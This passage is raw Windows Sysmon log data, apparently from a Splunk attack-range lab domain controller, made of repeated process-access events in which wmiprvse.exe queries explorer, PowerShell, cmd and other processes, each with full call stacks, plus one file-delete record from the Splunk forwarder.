16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243059Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243058Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243057Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243056Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243055Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243054Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243053Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243052Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243051Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243050Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243049Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243048Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243047Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002243046Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA5700D4AB976D92F46315852B023BE5,SHA256=3C5331C9AAEED86371AF9C92957E18983D5F18F5E21F69D26AE72AF791F4A8E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002243045Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243044Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243043Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243042Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.404{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243041Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002243040Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.389{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Win